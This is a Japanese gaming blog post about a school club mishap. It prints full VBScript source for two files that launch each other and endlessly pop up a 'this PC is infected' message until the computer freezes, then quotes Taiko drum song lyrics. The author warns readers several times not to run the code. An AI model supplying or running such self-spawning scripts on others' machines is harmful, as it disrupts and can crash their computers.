Chaos Corp.のまったりゲーム生活

主にプレイしているゲームの感想や攻略情報をのんびり記事にしていきます。

部活やらかした伝説 *2

どうも……いそぺんです………ガクッ
具合が悪くてもブログを書く、ブロガーの鑑…、ああー…おなか痛い……!

で、はい。今日は、部活やらかした伝説。
今日は、『コンピューターウイルスもどき作ってしまった』の巻!


目次

1.なにがあってこんなことに


『このコンピューターは侵されている!』こんなメッセージが無限に出てくるウイルスもどき。個人での使用なのでセーフです。


で、早速ここにソースコードを。よい子は真似しないでね!あと、vbScriptなので



asd.vbsという名前で保存

Dim iii
iii ="C:\Users\◯◯(ユーザー名)\Desktop asdasd.vbs"
CreateObject("Shell.Application").ShellExecute iii
MsgBox"このパソコンは侵されている!"



asdasd.vbsという名前で保存

Dim iii
iii ="C:\Users\◯◯(ユーザー名)\Desktop asd.vbs"
CreateObject("Shell.Application").ShellExecute iii
MsgBox"このパソコンは侵されている!"




開くと、メッセージが無限に出てきて、PCが重くなり、放っておくとフリーズします。大変危険なので、やることは推奨しません。というか、やらない方がいいです。



この二つを上のような名前でデスクトップに保存して、開きます。開く前にしっかり読んでください。



開くと、メッセージが無限に出てきて、PCが重くなり、放っておくとフリーズします。大変危険なので、やることは推奨しません。というか、やらない方がいいです。


大事なことなので二回言いました。本当にやめておいた方がいいです。



そして、Mさんがこれを作ってしまってね。それがもう大混乱。もともと部活にあったPCは安いやつで、すぐにフリーズ。強制シャットダウンを免れない。


さらにはコンピューター室まで大変なことにさせました。PCにかかれた誹謗中傷が原因で部活からPCが消えたらしいけど、ウイルスもどきのせいでもあると思う。


2.余談で歌詞紹介

神曲すぎる





Taiko drum monster


Let's go!
五線譜を裸足で駆け抜けてゆけ
鋼のように錆びた音符切り裂いて
僕たちの自在なmusic
Hey,welcome to the rhythmic party time…
Hi!!!
ただ一人でも Sing out! Sing out!
二人でドン!ドン!ドン!Bring out! Bring out !
伝えるよこのハートのBeat Beat
Get together,nice to meat you!
皆集えLight up! Light up!
心歌ってSinging! praises!
広がる空へと(Splash!)
降り注いだならEverywhere is paradise!!
Watch out! new adventure's coming!

Are you ready? Let's go!
自由に空を飛び回るようなメロディーで
気ままに時を跳び回るようなリズムで
七色の音の粒で
さあ塗り替えろ
Never heard your new world!!
one! two! three!
Ride on time!(time!)
Brighten on time!(time!)
Burst your new sensation!! wow
リズムをInvading now
そうさIt's just Taiko drum monster!
音に乗って(Hey!) 来いよって(Come on!)
Burning nice emotion wow!!
Yeah! (Yeah!)
音が紡ぐGeneration
音に乗れ 心歌え ビート刻め さあ踊れ
音になれ 重なって 続いてゆけ
Party goes on…
Ride on time!(time!)
Brighten on time!(time!)
Burst your new sensation!! wow
世界をInvading now
そうだWe're just Taiko drum monsters!
音になって 恋に落ちて
Feel like drive into magic show!!
Goes on...!!
僕ら紡ぐGenerations...
Hi!!!!



まとめ


危ないことはしないでください。


それでは!

にほんブログ村 ゲームブログ Minecraftへ
にほんブログ村